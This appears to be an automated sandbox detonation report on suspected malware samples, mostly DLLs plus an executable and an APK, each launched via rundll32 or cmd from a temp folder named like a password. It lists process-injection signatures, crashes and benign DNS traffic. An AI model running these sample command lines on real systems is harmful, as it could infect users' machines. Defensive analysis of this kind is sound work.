US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 200.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240611-en

Max time kernel

91s

Max time network

100s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\madexcept_.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1256 wrote to memory of 212 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1256 wrote to memory of 212 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1256 wrote to memory of 212 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\madexcept_.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\madexcept_.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
BE 88.221.83.195:443 www.bing.com tcp
US 8.8.8.8:53 195.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 52.111.227.13:443 tcp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win7-20240611-en

Max time kernel

142s

Max time network

126s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vclx120.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vclx120.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vclx120.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 272

Network

N/A

Files

memory/2432-0-0x0000000050310000-0x0000000050349000-memory.dmp

memory/2432-1-0x0000000050000000-0x0000000050116000-memory.dmp

memory/2432-2-0x0000000050120000-0x000000005030D000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win7-20240611-en

Max time kernel

118s

Max time network

119s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcruntime140_app.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1856 wrote to memory of 2036 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1856 wrote to memory of 2036 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1856 wrote to memory of 2036 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1856 wrote to memory of 2036 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1856 wrote to memory of 2036 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1856 wrote to memory of 2036 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1856 wrote to memory of 2036 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcruntime140_app.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcruntime140_app.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral20

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240508-en

Max time kernel

147s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcruntime140_app.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3220 wrote to memory of 3432 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3220 wrote to memory of 3432 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3220 wrote to memory of 3432 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcruntime140_app.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcruntime140_app.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3432 -ip 3432

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3432 -s 608

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240226-en

Max time kernel

139s

Max time network

147s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\api-ms-win-core-profile-l1-1-0.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\api-ms-win-core-profile-l1-1-0.dll,#1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3700 --field-trial-handle=2272,i,4858140932023865871,5726683989663339295,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 172.217.169.10:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 pki.goog udp
US 8.8.8.8:53 pki.goog udp
US 216.239.32.29:80 pki.goog tcp
US 8.8.8.8:53 10.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 29.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 35.166.122.92.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 40.173.79.40.in-addr.arpa udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win7-20240508-en

Max time kernel

120s

Max time network

121s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\coalfish.apk

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\coalfish.apk

Network

N/A

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240611-en

Max time kernel

149s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcruntime140.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4796 wrote to memory of 1372 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4796 wrote to memory of 1372 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4796 wrote to memory of 1372 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcruntime140.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcruntime140.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1372 -ip 1372

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1372 -s 600

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
BE 88.221.83.200:443 www.bing.com tcp
US 8.8.8.8:53 23.181.190.20.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 200.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 43.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 14.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral23

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win7-20240419-en

Max time kernel

119s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\NvStereoUtilityOGL_[1MB]_[1].exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\NvStereoUtilityOGL_[1MB]_[1].exe

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\NvStereoUtilityOGL_[1MB]_[1].exe"

Network

N/A

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

51s

Command Line

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\NvStereoUtilityOGL_[1MB]_[1].exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\NvStereoUtilityOGL_[1MB]_[1].exe

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\NvStereoUtilityOGL_[1MB]_[1].exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 1940 -ip 1940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 552

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1940 -ip 1940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1940 -s 552

Network

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

51s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\coalfish.apk

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\coalfish.apk

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

52s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\rtl120.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4920 wrote to memory of 3008 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4920 wrote to memory of 3008 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4920 wrote to memory of 3008 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\rtl120.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\rtl120.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3008 -ip 3008

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3008 -s 644

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

memory/3008-0-0x0000000050000000-0x0000000050116000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

52s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\api-ms-win-core-string-l1-1-0.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\api-ms-win-core-string-l1-1-0.dll,#1

Network

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win7-20240221-en

Max time kernel

121s

Max time network

122s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\madbasic_.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\madbasic_.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\madbasic_.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win7-20240508-en

Max time kernel

121s

Max time network

125s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\madexcept_.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\madexcept_.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\madexcept_.dll,#1

Network

N/A

Files

N/A